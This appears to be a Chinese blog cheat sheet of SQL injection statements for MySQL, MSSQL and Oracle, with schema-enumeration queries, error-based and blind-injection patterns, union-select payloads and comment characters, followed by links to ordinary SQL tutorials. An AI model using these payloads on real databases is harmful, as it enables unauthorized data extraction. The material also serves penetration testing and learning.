2. 程式人生 > 資料庫 >常見SQL滲透語句

常見SQL滲透語句

阿新 發佈:2020-12-01

  1. mysql
    查所有資料庫名
    select schema_name from information_schema.schemata
    檢視資料庫test_db 下的所有表名
    select table_name from information_schema.tables where table_schema='test_db'
    檢視資料庫test_db裡的表test_table下的所有列名
    select column_name from information_schema.columns where table_schema='test_db' and table_name='test_table'

    最終查詢資訊
    select 列名資訊 from 庫名.表名
    報錯注入
    extractvalue()
    如:
    updatexml()
    exp()
    mysql盲注核心
    ascii(substr('admin',2,1)
    從第2個開始擷取第一個數,對其ascii編碼
    要取表中某個數值,則利用limit 0,1 第1個開始取第一列
    常見函式
    length():判斷字串長度
    count(): 判斷有幾個資訊
    註釋符:--+、#

  2. mssql
    Sysdatabases表:該表儲存在master資料庫中,這個表中儲存的是所有的庫名,以及庫的ID,和一些相關資訊
    Sysobjects表:SQL-SERVER的每個資料庫內都有此係統表,它存放該資料庫內建立的所有物件

    Syscolumns表:該表位於每個資料庫中

    sysdatabases表,name列存放著資料庫名,並且該表只存在master資料庫
    select name from master.dbo. sysdatabases
    sysobjects表,name列存放著資料庫的所有的表名,存在於所有的資料庫下
    select id from sysobjects where xtype='U';
    syscolumns表,name列存放著資料庫的所有的列名,存在於所有的資料庫下。
    select name from syscolumns where id=(select id from master.dbo.sysobjects where name='表名')

    從第m行開始,取n行結果:
    select top n username from users where username not in (select top m username from users);
    mssql盲注核心
    CHAR() :ascii轉字元函式
    subString('admin',2,1):字串擷取函式
    從第2個開始擷取第一個數,對其ascii編碼
    註釋符:--

  3. oracl
    Oracle查詢需要帶上表名,Oracle只有一個表dual表
    select user from dual 獲取使用者名稱
    union select table_name,null,null from user_tables -- 獲取預設表user_tables 下的表名
    union select column_name,null,null from user_tab_columns where table_name='T_USER' --獲取表T_USER下的列名
    rownum=1 隨機獲取一行
    預設表user_tab_columns儲存當前資料庫所有列名
    如:union select column_name,null,null(有幾列,用null補齊) from user_tab_columns where table_name='T_user'
    select?name=1 and (select ascii(substr(table_name,1,1)) from user_tables where rownum=1 ) = ascii值
    註釋符:--

相關推薦

常見SQL滲透語句

mysql 查所有資料庫名 select schema_name from information_schema.schemata 檢視資料庫test_db 下的所有表名

mysql常見sql語句練習

技術標籤:MySQLmysql資料庫 文章目錄 1. Mysql基本語句複習1.1資料庫建庫操作1.2建表操作1.3基本語句1.4列操作(重點)1.5join操作(重點)1 inner join或者 join2 left join3 right join4..查詢只參加了sing興

解決死鎖之路3 - 常見 SQL 語句的加鎖分析 (轉)

出處:https://www.aneasystone.com/archives/2017/12/solving-dead-locks-three.html 這篇部落格將對一些常見SQL 語句進行加鎖分析,看看我們平時執行的那些 SQL 都會加什麼鎖。只有對我們所寫的 SQL 語句加鎖過

Mysql資料庫之sql基本語句小結

本文例項講述了Mysql資料庫之sql基本語句。分享給大家供大家參考,具體如下:

從零開始學習SQL查詢語句執行順序

SQL查詢語句執行順序如下: (7) SELECT (8) DISTINCT <select_list> (1) FROM <left_table>

可重複執行的SQL alter語句

-- 修改通知郵件title欄位 DROP PROCEDURE IF EXISTS `MODIFY_TITLE_COLUMN_IN_NOTICE_MAIL`; DELIMITER //

MySQL45講——日誌系統:一條SQL更新語句是如何執行的 學習筆記

資料庫備份:MySQL可以恢復到半個月內任意一秒的狀態。 MySQL查詢語句和更新語句的異同?

odoo 是怎樣格式化sql 查詢語句

主要還是使用format 來替換變數 # generic INSERT and UPDATE queries INSERT_QUERY = "INSERT INTO {table} ({cols}) VALUES {rows} RETURNING id"

00-基礎SQL-SELECT語句

DML(資料操作語言,增刪查改)DDL(資料定義語言,比如建立、修改或刪除資料庫物件)DCL(資料控制語言,控制資料庫的訪問)

資料庫基礎之SQL查詢語句執行流程

MySQL資料庫架構(圖片來自極客時間林曉彬MySQL實戰45講) MySQL可以分為server層和引擎層

當面試官問: SQL 查詢語句如何執行時?

想要回答這個問題,首先我們需要知道:MySQL都有哪些零件? 1.聯結器:管理連線,許可權驗證。

SQL 迴圈語句幾種寫法

1、正常迴圈語句 declare @orderNum varchar(255) create table #ttableName(id int identity(1,1),Orders varchar(255))

SQL 基本語句規範

文章轉載自 微信公眾號 資料管道 摘要 經常看到一份資料分析崗位的招聘要求:“熟練使用SQL”。那你真的熟練嗎?

一條 SQL 查詢語句是如何執行的?

MySQL 都有哪些零件? 1.聯結器:管理連線,許可權驗證。2.分析器:詞法分析,語法分析。3.優化器:執行計劃生成,索引選擇。4.執行器:操作儲存引擎,返回結果。5.儲存引擎:儲存資料,提供讀寫介面。

SQL 查詢語句先執行 SELECT?

SELECT語句的完整語法: SELECT DISTINCT <select_list> FROM <left_table> <join_type> JOIN <right_table>

SQL SELECT 語句

SELECT 語句用於從資料庫中選取資料。 SQL SELECT 語句 SELECT 語句用於從資料庫中選取資料。

SQL DELETE 語句

DELETE 語句用於刪除表中的記錄。 SQL DELETE 語句 DELETE 語句用於刪除表中的行。 SQL DELETE 語法

SQL UPDATE 語句

UPDATE 語句用於更新表中的記錄。 SQL UPDATE 語句 UPDATE 語句用於更新表中已存在的記錄。

基礎架構:一條SQL查詢語句是如何執行的?

導讀 Mysql在中小型企業中是個香餑餑,目前主流的資料庫之一,幾乎沒有一個後端開發者不會使用的,但是作為一個老司機,僅僅會用真的不夠。

動態SQL基本語句用法

1.if語句 如果empno不為空,則在WHERE引數後加上AND empno = #{empno},這裡有1=1所以即使empno為null,WHERE後面也不會報錯。